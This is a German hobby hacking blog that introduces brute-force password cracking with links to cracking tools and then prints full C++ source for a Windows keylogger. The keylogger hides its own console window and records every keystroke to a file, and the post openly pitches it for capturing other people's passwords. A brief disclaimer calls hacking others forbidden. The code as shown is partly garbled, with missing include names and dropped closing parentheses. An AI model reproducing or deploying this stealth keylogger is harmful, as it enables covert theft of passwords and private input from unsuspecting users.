Letztes Feedback

Meta





 

Über

Ich bin leidenschaftlich Hacker. Meine Erfahrungen möchte ich mi euch in diesen Blog teilen. Nur zur Info: wenn ihr versucht andere Leute zu hacken müsst ihr wissen dass das VERBOTEN ist!!!

Trotzdem vel spaß!

 

Alter: 50
 


Werbung




Blog

Techniken

Brute Force

 Für viele Probleme in der Informatik sind keine effizienten Algorythmen bekannt. Der natürlichste und einfachste Ansatz zu einer algorithmischen Lösung eines Problems besteht darin, einfach alle potenziellen Lösungen durchzuprobieren, bis die richtige gefunden ist. Diese Methode nennt man „Brute-Force-Suche“ (engl. brute-force search).

Ein wichtiger Anwendungsbereich findet sich in der Computersicherheit. Ein oft angeführtes Anwendungsbeispiel für die Brute-Force-Methode ist hier das Brechen oder umgangssprachlich „Knacken“ von Passwörern.

Dazu Gibt es Verschiedene Programme, hier zwei gute:

Brutus (http://brutus.softonic.de/)

Cain und Abel (http://www.chip.de/downloads/Cain-Abel_17043501.html)

Mit ein bischen c++ Erfahrung lässt sch so ein Programm auch selber machen.

c++ code (http://www.hackerboard.de/code-kitchen/25027-bruteforce-c.html)

 

Keylogging

Ein Keylogger st ein Programm das alle Tastenanschläge speichert,

um Passwörter usw. zu herausfinden.

so ein programm könnt ihr euch einfach mit c++ erstellen. hier der code:

 

#include
 using namespace std;
 #include
 #include
 int Save (int key_stroke, char *file);
 void Stealth();

 int main()
 {
 Stealth();
 char i;

 while (1)
 {
 for(i = 8; i <= 190; i++)
 {
 if (GetAsyncKeyState(i) == -32767)
 Save (i,"LOG.txt";
 }
 }
 system ("PAUSE";
 return 0;
 }

 /* *********************************** */

 int Save (int key_stroke, char *file)
 {
 if ( (key_stroke == 1) || (key_stroke == 2) )
 return 0;

 FILE *OUTPUT_FILE;
 OUTPUT_FILE = fopen(file, "a+";

 cout << key_stroke << endl;

 if (key_stroke == 8)
 fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]";
 else if (key_stroke == 13)
 fprintf(OUTPUT_FILE, "%s", "n";
 else if (key_stroke == 32)
 fprintf(OUTPUT_FILE, "%s", " ";
 else if (key_stroke == VK_TAB)
 fprintf(OUTPUT_FILE, "%s", "[TAB]";
 else if (key_stroke == VK_SHIFT)
 fprintf(OUTPUT_FILE, "%s", "[SHIFT]";
 else if (key_stroke == VK_CONTROL)
 fprintf(OUTPUT_FILE, "%s", "[CONTROL]";
 else if (key_stroke == VK_ESCAPE)
 fprintf(OUTPUT_FILE, "%s", "[ESCAPE]";
 else if (key_stroke == VK_END)
 fprintf(OUTPUT_FILE, "%s", "[END]";
 else if (key_stroke == VK_HOME)
 fprintf(OUTPUT_FILE, "%s", "[HOME]";
 else if (key_stroke == VK_LEFT)
 fprintf(OUTPUT_FILE, "%s", "[LEFT]";
 else if (key_stroke == VK_UP)
 fprintf(OUTPUT_FILE, "%s", "[UP]";
 else if (key_stroke == VK_RIGHT)
 fprintf(OUTPUT_FILE, "%s", "[RIGHT]";
 else if (key_stroke == VK_DOWN)
 fprintf(OUTPUT_FILE, "%s", "[DOWN]";
 else if (key_stroke == 190 || key_stroke == 110)
 fprintf(OUTPUT_FILE, "%s", ".";
 else
 fprintf(OUTPUT_FILE, "%s", &key_stroke);

 fclose (OUTPUT_FILE);
 return 0;
 }

 /* *********************************** */

 void Stealth()
 {
 HWND Stealth;
 AllocConsole();
 Stealth = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(Stealth,0);
 }

 

Andere Methoden

 Es gibt auch viele andere Methoden um zu hacken, aber die werde ich euch später zeigen.

1 Kommentar 24.11.13 12:17, kommentieren

Werbung


Grundlagen

Kurzerklärung:

Das engl. „to hack“ bedeutet: in etwas eindringen. In der Informatik gilt ein Hacker als Person, die Freude an Erstellung bzw. Veränderung von Software oder Hardware hat. Der Begriff wird im Zusammenhang mit Kriminalfällen für Personen verwendet, die solche Lücken in fremden Systemen unerlaubt für eigene, oft kriminelle Zwecke wie den Diebstahl von Informationen nützen. "Echtes" Hacking bedeutet: Einbruch in Computer bzw. Computernetze.

Wir werden uns eher mit Softwarehacking beschäftigen. Dazu gibt es verschiedene Methoden wie ihr das anstellen könnt, die ich euch glech erklären werde.

24.11.13 11:47, kommentieren